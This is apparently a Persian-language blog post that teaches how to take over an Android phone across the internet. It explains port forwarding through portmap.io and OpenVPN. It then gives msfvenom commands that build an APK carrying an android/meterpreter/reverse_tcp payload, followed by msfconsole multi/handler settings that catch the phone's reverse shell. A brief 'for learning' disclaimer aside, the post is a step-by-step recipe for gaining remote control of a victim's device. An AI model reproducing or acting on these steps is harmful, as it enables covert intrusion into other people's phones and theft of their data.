Elias Rouhani
Elias Rouhani
خواندن ۳ دقیقه·۵ سال پیش

نفوذ به اندروید-برای یادگیری

امروز روش نفوذ به یک اندروید رو می خواهیم بگیم، اما چطوری؟

این نکته را در نظر بگیرد که ممکن برروی بعضی از سمارت فون ها این روش نفوذ جواب ندهد.

نکته:
نکته:


اگر به دنبال هک همسایه امدی؟ اشتباه امدی!

معمولا ابزارهای زیادی هستند که در کالی لینوکس برای اینکار استفاده می‌شود و تمام اموزش های برروی localshot انجام می‌شود ولی اگر بخواهیم از طریق اینترنت به هدفمون دسترسی داشته باشیم چی؟

همانطور که میدونید ای پی های که برروی رایانه های شخصی تنظیم می‌شود ای‌پی های محلی به انها گفته می شود و بیرون از محدوده‌ای مودم یا اینترنت قابل دسترس نیست.

یک روش اینکه یک سروری داشته باشیم که هزینه ای زیادی دارد و نمی صرفه، دو راه دیگر می‌ماند

یکی استفاده از سایت مثل portmap که port forwarding را انجام میدهد استفاده کنیم (خیلی ساده بگیم دری برای دسترسی به اینترنت می‌دهد)

روش دیگر این است که رایانه خود را تبدیل به سرور کنید، البته نکه بریم یک ای پی عمومی بخریم، از ای پی عمومی که خود ISP به ما داده استفاده کنیم. وقتی توی اینترنت جلمه ی whatis my ip جستجو می‌کنید ای پی عمومی به نمایش در می‌اید.

برای روش اول به سایت میریم یک حساب کاربری بازمی‌کنیم بعد از قسمت config یک پیکربندی برای open vpn درست می‌کنیم.

بعد به قسمت mapping ruls می‌ریم تا پورت اضافه می ‌کنیم:

یک پورت برای

port on portmap.io

and

port on your pc

هر عددی که می خواهید را می‌دهید برروی create کلیک می‌کنید.

حالا اون فایل openvpn را که در config ساخته بود را دانلود و با دستور زیر به ان متصل می شویم:

openvpn -config yourfilename.ovpn

البته سرویس openvpn باید نصب باشد:

apt-get install openvpn

حالا هم میریم سراغ ابزاری که برای نفوذ می‌خواهیم استفاده کنیم به نام msfvenom:

اولی از همه:

service postgresql start and:
msfvenom android/meterpreter/reverse_tcp lhost=link_add lport=link_port > app.apk

نکته بجای link_port و link-add ادرس های که از سایت گرفتیم در قست ruls استفاده می‌کنیم:

همچین ادرسی
همچین ادرسی


msfconsole

حالا وقت پیکربندی گیرنده رایانه خودمون است:

use multi/handler
set payload android/meterpreter/reverse_tcp

پورت ها رو تنظیم می کنیم:

set lhost local ip
set lport portlocal

نکته portlocal که می‌دهیم باید با پورت که برروی سایت در قسمت port on your pc داده ایم یکی باشد، localip هم ای پی محلی خود را می‌دهیم.

در اخر هم برای دسترسی به هدفمون دستور زیر را اجرا می‌کنیم:

exploit

این روش تنها بعدی که دارد هربار باید با openvpn به سرور متصل شویم.

نکته جذاب اینکه تازه گی ها API اضافه شده که تمامی کارهای ساخت openvpn و rule را از طریق برنامه نویسی می‌تونیم این کار انجام بدیم. خیلی هم جذاب چنین برنامه ای را با پایتون بنویسم، یکبار امتحان کنید البته شاید بعدا درباره استفاده از API صحبتی کردیم.




کالی لینوکسهکپورت فورواردینگmsfvenomدرک از بزارها کالی لینوکس
نویسنده های خوب کسانی هستند که به خوبی رونویسی می‌کنند
شاید از این پست‌ها خوشتان بیاید